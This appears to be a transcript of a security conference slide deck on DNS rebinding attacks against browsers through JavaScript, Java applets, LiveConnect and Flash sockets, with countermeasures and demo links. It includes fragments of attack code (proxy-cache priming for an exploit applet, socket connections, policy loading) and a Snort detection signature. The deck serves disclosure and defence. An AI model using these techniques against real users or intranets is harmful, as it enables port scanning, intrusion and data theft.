Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 DNS Rebinding and Socket API Kanatoko

Published byScarlett York Modified over 8 years ago

Similar presentations

Presentation on theme: "1 DNS Rebinding and Socket API Kanatoko"— Presentation transcript:

1 1 DNS Rebinding and Socket API Kanatoko http://www.jumperz.net/

2 DNS Rebinding Overview(1) One of the attack vectors Not a bug of a certain software All kinds of Operating Systems may be affected –Windows, Linux, MacOSX … There are no patches Occurs in the relationship with Web servers, DNS servers, proxy servers Real threat Maybe your system is vulnerable 2

3 DNS Rebinding Overview(2) Eve controls the web browser of Alice –and make it do something Stealing information Make Alice attack Not a direct attack against the servers Not an attack against the DNS servers 3

4 How the attack is deployed? Deployed when Alice visits Eve’s trap page Same as XSS, CSRF Unawares Social engineering with using E-mails, BBS, comments on blogs It is difficult to find out whether the page is a trap or not Sometimes the hacked web sites ( like famous companies) are used to deploy the attack 4

5 Technologies used in DNS Rebinding JavaScript Java FLASH Malicious codes starts running on the Alice’s browser But there are security constraints –For example: Cannot read from or write to the local files Each of these technologies has a network access function 5

6 When Alice visits Eve’s page…(1) Eve’s malicious code starts running and accesses over the network JavaScript –Get resources using XMLHttpRequest,SCRIPT tag, IMG tag(HTTP) FLASH: –URLLoader(HTTP), –Socket(TCP) Java: –URLConnection(HTTP), –Socket(TCP) –DatagramSocket(UDP) 6

7 When Alice visits Eve’s page…(2) Of course there are security constraints on the network access functions Can access only to the origin host on that Java Applets(.class,.zip,.jar), FLASH SWF files, web pages are located Known as “Same Origin Policy” 7

8 DNS Rebinding attack vector(1) Eve owns the top level domain “eve.tld” So Eve can control the DNS server of “eve.tld” Eve runs a web server at “218.45.25.5” and locates the malicious codes there Eve binds “218.45.25.5” as the address of the hostname “www.eve.tld”. Eve sets very short value ( for example, 8 seconds ) as a TTL value of the DNS record Alice tries to access to the Eve’s trap page located at “www.eve.tld” The first name resolution is done by Alice and “218.45.25.5” is returned from the Eve’s DNS server. Alice’s browser loads the Eve’ s trap page. Soon TTL expires At the same time, Eve changes the configuration of the DNS server and binds “127.0.0.1” as the address of the hostname “www.eve.tld” 8

9 DNS Rebinding attack vector(2) The Eve’s malicious code on the Alice’s browser tries to access to “www.eve.tld” The second name resolution is done by Alice. This time “127.0.0.1” is returned from the Eve’s DNS server. The code accesses to “127.0.0.1” Though “127.0.0.1” is not an Eve’s host, the code is allowed to access to “127.0.0.1” because the hostname is “www.eve.tld” ( same origin ) As the example above shows, DNS Rebinding enables Eve to access to the addresses like “127.0.0.1” which of course should not be allowed to access 9

10 What is DNS Pinning? Only FLASH is vulnerable to the DNS Rebinding attack vector explained in the previous page The other two technologies ( JavaScript and Java ) caches the DNS information in their own ways TTL does not expire. This behavior violates the DNS protocol It is called as “DNS Pinning” Sun Microsystems implements DNS Pinning on Java as a countermeasure to DNS Rebinding ( or DNS Spoofing ). –On the other hand, the browser vendors( Microsoft, Mozilla.org and Opera ) seem that they are not so conscious of DNS Rebinding Eve needs to make Alice discard the cached DNS information to execute DNS Rebinding 10

11 What is Anti-DNS Pinning(1) Make Alice discard the pinned DNS information Can be applied only to JavaScript –FLASH does not pin DNS at all –Java never discards the pinned DNS information. Java is immune to Anti-DNS Pinning Martin Johns notified this issue to the security community at Aug 2006 –http://shampoo.antville.org/stories/1451301/ 11

12 What is Anti-DNS Pinning(2) If an access to the server fails after an appropriate period has elapsed, the browser discards the pinned DNS information and executes the second name resolution –Change the firewall rule –Shut down the web server –Make Alice access to the closed port ( for example- http://example.com:81/ ) Anti-DNS Pinning make Eve possible to force Alice execute the second name resolution. Eve can launch DNS Rebinding as a result Anti-DNS Pinning is a step used in DNS Rebinding (against JavaScript) 12

13 DNS Rebinding against JavaScript XMLHttpRequest is mainly used Get information from the web servers to those Eve cannot access without DNS Rebinding, and send it to the Eve’s host The targets are only web servers because HTTP is used in the communication It is not “Cross Domain” but “Cross Address”. So the HTTP requests do not contain Cookies and Authorization headers of the target web page For this reason it is not used in CSRF. For the same reason it means almost nothing to force Alice to get information from the Internet. So the Intranet is the main target There are some exceptions. If an address-based authentication ( for example: The countermeasure of Universal PDF XSS issue) exists, Eve may use DNS Rebinding for get information via the Alice’s browser Stolen information is sent to the Eve’s another host. It is quite easy for Eve because there are no “Same Origin Policy” about sending data with JavaScript 13

14 Demo:DNS Rebinding on JavaScript http://www.jumperz.net/index.php?i=2&a=1&b=7 Get information from the Intranet and send it to “www.jumperz.net” I was skeptical about whether DNS Rebinding is a real threat, when I read the Martin’s article for the first time It took me 20 hours to make this demo to work stably Web application(JSP), DNS server(djbdns) and JavaScript on the browser are used Uses “closed port method” to launch Anti-DNS Pinning Special Thanks to Kawa from Team Tidori 14

15 JavaScript on each browser On Firefox, the code needs to wait for about 2 minutes to launch Anti-DNS Pinning On IE6 and Opera, the code only needs to wait for the TTL value( a few seconds ) IE7- not checked yet 15

16 Countermeasures for DNS Rebinding on JavaScript Require authentication for HTTP accesses Basic authentication is enough Disabling JavaScript is perfect It is not a threat because easy and good countermeasures exist Of course the default usernames/passwords ( of ADSL routers, for example ) need to be changed 16

17 DNS Rebinding on FLASH and Java(1) Socket APIs available The Eve’s code can implement any TCP based protocol It is far more dangerous than DNS Rebinding on JavaScript To any hosts on the Internet and the Intranet With Any TCP based protocol From Alice’s browser –Portscan –SPAM e-mails –Exploiting known vulnerabilities –File sharing network –DoS attacks –Exploiting address based authentications 17

18 DNS Rebinding on FLASH and Java(2) Eve can use the Alice’s browser as a TCP( or UDP ) proxy because the Eve’s malicious code can send and receive data in anytime using another host like “www2.eve.tld” even on a DNS rebound situation The Alice’s system ( or network ) could be both a victim and an assailant 18

19 DNS Rebinding on Java(1) Sun’s Java Virtual Machine The code runs under a security restriction called “Sandbox” The host that is allowed to communicate over the network with Java applet is the origin of the applet. It is not the origin of the web page The Socket class ( TCP ) and the DatagramSocket ( UDP ) class are available Binary data can be sent and received Caches the DNS record until the termination of the process ( forever ). It is a very strong DNS Pinning Apparently violates the DNS protocol. It makes trouble when you implement some server applications like SMTP server with using Java The JVM parameter “networkaddress.cache.ttl” enables you to control this behavior. But still in this case the TTL value of the DNS record is ignored The “networkaddress.cache.ttl” parameter cannot be set from the Java applet 19

20 DNS Rebinding on Java(2) There was a related issue – http://www.cs.princeton.edu/sip/news/sun-02-22-96.html There are no configurations like “Disable sockets on the Java applets” We cannot remove the Socket class from Java because it is also used in the download process of the applet Java downloads the applet by itself. Not relies on the browser So the cache of the browser is not used when the applet is downloaded by Java Java does name resolution for downloading The point is that the Java does name resolution BEFORE the applet has downloaded And the result of the name resolution will be cached forever 20

21 DNS Rebinding on Java(3) If the Eve’s DNS server returns the fake IP address as a result of the Alice’s name resolution, the Java applet will not be downloaded and the attack will fail If the Eve’s DNS server returns a correct IP address as a result of the Alice’s name resolution, the Java applet will be downloaded properly. But Eve cannot rebind the IP address because the Alice’s Java caches the result of the first name resolution forever. The attack will fail as a result In both case the attack will fail Only the users behind proxy servers are vulnerable The business users in the cooperation network with the application proxy gateway are vulnerable than the home users with NAT 21

22 DNS Rebinding on Java(4) //make the proxy cache the applet var foo = new Image(); foo.src = “http://12345.jumperz.net/exploits/MTCPCApplet.class”; //wait for the TTL to expire setTimeout( 'f1()', 1000 * 12 ); //add the applet tag to the page function f1() { var base = document.getElementById( "base" ); var str = ' ' + ' ' + ' '; base.innerHTML = str; } 22 Make the proxy server cache the Java applet before Java is activated

23 DNS Rebinding on Java(5) The downloading of the Java applet is done by the proxy server though Java does a name resolution and a spoofed IP address is returned. The cache of the Java applet in the proxy server is returned to the Alice’s Java, and the Eve’s malicious code starts running successfully - The request of the browser GET /exploits/MTCPCApplet.class HTTP/1.0 Accept: */* Referer: http://1190066223254.jumperz.net/exploits/ap3.jsp?address=127.0.0.1 Accept-Language: ja User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;.NET CLR 2.0.50727) Host: 1190066223254.jumperz.net Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A Connection: Keep-Alive - The request of the Java applet GET /exploits/MTCPCApplet.class HTTP/1.1 User-Agent: Mozilla/4.0 (Windows 2000 5.0) Java/1.6.0_02 Host: 1190066223254.jumperz.net Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A Connection: keep-alive 23

24 Demo: DNS Rebinding on Java http://www.jumperz.net/index.php?i=2&a=1&b=10 Scan some ports and retrieve the banner from the server, and send the result to “www.jumperz.net” Works on IE, Firefox, and Opera Works only on users behind proxy 24

25 Countermeasures for DNS Rebinding on Java(1) Disabling Java Restrict the ports allowed to connect to with using personal firewalls ( for example: only 80 and 443 ) Require authentication for every protocol used on the Intranet Patch known vulnerabilities Use firewall to find and stop the outgoing attacks. ( for example UDP 53 DoS ) It is not easy to find the malicious Java code on the gateway or IDS or IPS because the Java applet class file could be zipped into.zip and.jar files 25

26 Countermeasures for DNS Rebinding on Java(2 ) public void checkConnect(String host, int port) { if (host == null) { throw new NullPointerException("host can't be null"); } host = "127.0.0.2"; if (!host.startsWith("[") && host.indexOf(':') != -1) { host = "[" + host + "]"; } if (port == -1) { checkPermission(new SocketPermission(host, SecurityConstants.SOCKET_RESOLVE_ACTION)); } else { checkPermission(new SocketPermission(host+":"+port, SecurityConstants.SOCKET_CONNECT_ACTION)); } 26 Setup a JRE only for the Java applets and patch the SecurityManager class

27 DNS Rebinding on LiveConnect Works only if both Java and JavaScript are enabled One can write a Java code in a JavaScript code – var s = new java.net.Socket( "www.jumperz.net", 25 ) It is a part of the “LiveConnect” technology Not supported on IE Eve can send the malicious Java code to Alice before Java is activated The users NOT behind proxy are also vulnerable On the implementation of LiveConnect of Opera it seems that there are some bugs Firefox is the most dangerous browser 27

28 Demo: DNS Rebinding on LiveConnect http://www.jumperz.net/index.php?i=2&a=1&b=9 A collaboration of Martin Johns and me –http://shampoo.antville.org/stories/1566124/ Scan some ports and retrieve the banner from the server, and send the result to www.jumperz.netwww.jumperz.net Works on Firefox and Opera 28

29 Countermeasures for DNS Rebinding on LiveConnect The same as those of Java 29

30 DNS Rebinding on FLASH(1) The Socket class is available from ActionScript 3.0 Can communicate with server using TCP layer protocol Binary data can be sent and received Works on Flash Player 9.0 or later The host that is allowed to communicate over the network with FLASH is the origin of the FLASH.swf file. It is not the origin of the web page FLASH does not implement DNS Pinning at all The DNS information will be discarded after the TTL has elapsed DNS Rebinding on FLASH is very easy It is a threat that FLASH has added the Socket class because FLASH is one of the most widely used plugins. Many users enable FLASH on their browsers There are no configurations like “Disable sockets on FLASH” 30

31 DNS Rebinding on FLASH(2) private var sock1:Socket; private function test1():void { var sock1:Socket = new Socket(); sock1.addEventListener( Event.CONNECT, onConnected ); sock1.connect( “www.jumperz.net", 80 ); } private function onConnected( e:Event ):void { sock1.writeMultiByte( "GET / HTTP/1.0\r\n\r\n", "ISO-8859-1" ); } 31 An example code of the Socket class

32 DNS Rebinding on FLASH(3) Can connect only to ports over 1024 by default. This is a difference between FLASH and Java Policy-loading is required to connect to ports under 1024. This is done by using a TCP-based original protocol Policy-loading is done successfully under NAT Eve could use port 443 for policy-loading Detecting the network traffic of the policy-loading with IDS or IPS would have some meaning An example signature ( Snort ) –alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FLASH Socket policy-file-request"; flow:to_server,established; content:" "; nocase; ) 32

33 DNS Rebinding on FLASH(4) //load policy using port 2 flash.system.Security.loadPolicyFile( "xmlsocket://www.jumperz.net:2" ); from client to server from server to client 33 An example code of policy-loading and the traffic

34 Demo: DNS Rebinding on FLASH http://www.jumperz.net/index.php?i=2&a=1&b=8 This demo notified the existence of the Socket class of FLASH to the security community Works on Flash Player 9.0 or later Cannot scan ports under 1024 in non-NAT network because of the FLASH policy-loading mechanism Scan some ports and retrieve the banner from the server, and send the result to “www.jumperz.net” 34

35 Countermeasures for DNS Rebinding on FLASH(1) Disabling FLASH The same as those of Java 35

36 Countermeasures for DNS Rebinding on FLASH(2) Patch.dll or.ocx files Overwrite the “call” instruction to the “connect” winsock API Almost no side effects ( you still can see YouTube ) 36 BEFORE AFTER

37 Dynamic DNS and DNS Pinning At some point an IP address is used by the Bob’s web server Alice visits the Bob’s web site Bob’s connection has lost and he reconnect to the Internet, and the IP address of the Bob’s server has changed Soon Bob rebinds the new IP address with the Bob’s hostname with using some Dynamic DNS system Eve gets Bob’s old IP address ( bound by ISP, with DHCP ) If Alice has pinned the DNS information of the Bob’s hostname, the Alice’s HTTP requests will be sent to the Eve’s web server. Of course those should be sent to the Bob’s web server In this case Eve can get the Alice’s session id from the cookie and can hijack her session This will happen to every web sites because every service based on DNS is “dynamic” in long term It means that DNS Pinning may cause another security problem 37

38 Countermeasures on all 3 technologies Monitoring DNS packets (Is there any good system for this purpose ?) –Change of IP address in a short period –Especially from global IP to private IP –It is hard to find DNS Rebinding attacks from the TTL values because very short TTL values are widely used The plugins of Firefox is useful ( NoScript, FlashBlock etc) 38

39 Other things DNS Rebinding is a really complicated problem –Web browsers –Plugins –DNS –Proxies Real threat We cannot find attacks if it is not prepared to find Do we need some detection system for DNS Rebinding, as a first step? We need more flexible configurations on the browsers –“Disable/Enable Sockets on Java/FLASH” –“IP address has changed” notification dialogs 39

40 Thank you! Any questions? 40

Download ppt "1 DNS Rebinding and Socket API Kanatoko"

Similar presentations

Chapter 17: WEB COMPONENTS

Chapter 17: WEB COMPONENTS
Firewalls By Tahaei Fall 2012. What is a firewall? a choke point of control and monitoring interconnects networks with differing trust imposes restrictions.

Firewalls By Tahaei Fall What is a firewall? a choke point of control and monitoring interconnects networks with differing trust imposes restrictions.
By Vikas Debnath KV IT-Solutions Pvt. Ltd.

By Vikas Debnath KV IT-Solutions Pvt. Ltd.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 7 Working with Proxy Servers & Application-Level Firewalls By Whitman, Mattord,

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 7 Working with Proxy Servers & Application-Level Firewalls By Whitman, Mattord,
Working with Proxy Servers and Application-Level Firewalls Chapter 5.

Working with Proxy Servers and Application-Level Firewalls Chapter 5.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Firewalls and Intrusion Detection Systems

Firewalls and Intrusion Detection Systems
Exam ● On May 15, at 10:30am in this room ● Two hour exam ● Open Notes ● Will mostly cover material since Exam 2 ● No, You may not take it early.

Exam ● On May 15, at 10:30am in this room ● Two hour exam ● Open Notes ● Will mostly cover material since Exam 2 ● No, You may not take it early.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.
Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.

Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.
Hands-On Microsoft Windows Server 2003 Networking Chapter 7 Windows Internet Naming Service.

Hands-On Microsoft Windows Server 2003 Networking Chapter 7 Windows Internet Naming Service.
ITIS 6167/8167: Network and Information Security Weichao Wang.

ITIS 6167/8167: Network and Information Security Weichao Wang.
Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Spring 2006.

Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Spring 2006.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Chapter 7: Working with Proxy Servers & Application-Level Firewalls

Chapter 7: Working with Proxy Servers & Application-Level Firewalls
1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.

1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.
1 Enabling Secure Internet Access with ISA Server.

1 Enabling Secure Internet Access with ISA Server.
FIREWALL TECHNOLOGIES Tahani al jehani. Firewall benefits  A firewall functions as a choke point – all traffic in and out must pass through this single.

FIREWALL TECHNOLOGIES Tahani al jehani. Firewall benefits  A firewall functions as a choke point – all traffic in and out must pass through this single.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Similar presentations

Ads by Google